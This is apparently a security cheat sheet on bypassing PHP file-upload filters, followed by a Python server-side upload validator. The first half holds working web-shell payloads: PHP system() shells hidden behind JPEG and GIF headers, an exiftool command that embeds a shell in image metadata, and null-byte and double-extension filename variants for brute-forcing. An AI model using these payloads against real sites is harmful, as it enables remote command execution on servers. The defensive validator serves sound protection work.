File Upload

PHP file upload bypass

  • Use MIME type (magic bytes of an image file). Upload a simple image file and only keep the first few bytes of the content and change the file name to "pic.jpg.php" while keeping the Content-Type: image/jpeg.


Content-Disposition: form-data; name="imagen"; filename="pic.jpg.php"
Content-Type: image/jpeg

// Base64 decode this line before sending the request
/9j/4AAQSkZJRgABAQEAYABgAAD//gA7Q1JFQVRPUjogZ2QtanBlZyB2MS4wICh1c2luZyBJSkcgSlBFRyB2OTApLCBxdWFsaXR5ID0gOTAK/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AAEQgAyADIAwEiAAIRAQMRAf/EAB8AAAEFAQEBAQEBAAAAAAAAAAABAgMEBQYHCAkKC//EALUQAAIBAwMCBAMFBQQEAAABfQECAwAEEQUSITFBBhNRYQcicRQygZGhCCNCscEVUtHwJDNicoIJ
<?php echo system($_REQUEST['cmd']);?>
// GIF89a; header
GIF89a;
<?
system($_GET['cmd']); # shellcode goes here
?>
  • Exiftool

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' file.jpg
mv file.jpg file.php.jpg
  • Add special characters or null bytes to the name. Use Burp to brute-force the variants.

file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
  • Use double extensions to deceive

file.png.php
file.png.pHp5
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png

file.png.jpg.php
file.php%00.png%00.jpg
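
Seen from the defending side, every variant above relies on the server trusting the client's filename or Content-Type. The Python below is an added example, not code from the original page: a server-side validator (hypothetical names `validate_upload` and `EXT_MAGIC`) that ignores Content-Type, checks the body's magic bytes against a whitelisted extension, refuses names with control characters, null bytes, percent residue or more than one dot, and never stores the client's name. The sample bodies in the usage are constructed.

```python
import re
import secrets

# Extension whitelist mapped to the magic bytes the body must start with.
# The client-supplied Content-Type is never consulted: it is attacker-controlled.
EXT_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Null bytes, CR/LF and other control characters, path separators and
# percent-encoding remnants: none of them belong in a name we are going to store.
FORBIDDEN = re.compile(r"[\x00-\x1f\x7f/\\%]")


def validate_upload(filename: str, body: bytes):
    """Return a server-chosen storage name for an acceptable image upload,
    or None when the upload is rejected. Names such as 'pic.jpg.php',
    'file.pHp5....', 'file.php%00.png' or 'file.phpJunk123png' are all refused."""
    if not filename or FORBIDDEN.search(filename):
        return None
    # Exactly one dot: the name must be '<base>.<ext>'. This single check refuses
    # double extensions, trailing dots and an empty extension.
    parts = filename.split(".")
    if len(parts) != 2 or not parts[0]:
        return None
    ext = parts[1].lower()  # 'pHp5' / 'PHP' are compared as 'php5' / 'php'
    if ext not in EXT_MAGIC:
        return None
    # The body must really start like the image type the extension claims.
    if not body.startswith(EXT_MAGIC[ext]):
        return None
    # Weak defence in depth against PHP planted in metadata (exiftool -Comment):
    # the long open tag is cheap to spot, short tags and obfuscation are not, so
    # this never replaces "no execute permission in the upload directory".
    if b"<?php" in body.lower():
        return None
    # Never reuse the client's name on disk: random base plus the validated extension.
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 32  # constructed JPEG-like body
    for name in ["photo.jpg", "pic.jpg.php", "file.php%00.png", "file.pHp5....", "file.phpJunk123png"]:
        print(repr(name), "->", validate_upload(name, jpeg))
```

Re-encoding accepted images with an image library before storage additionally strips metadata such as the comment field used in the exiftool step.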
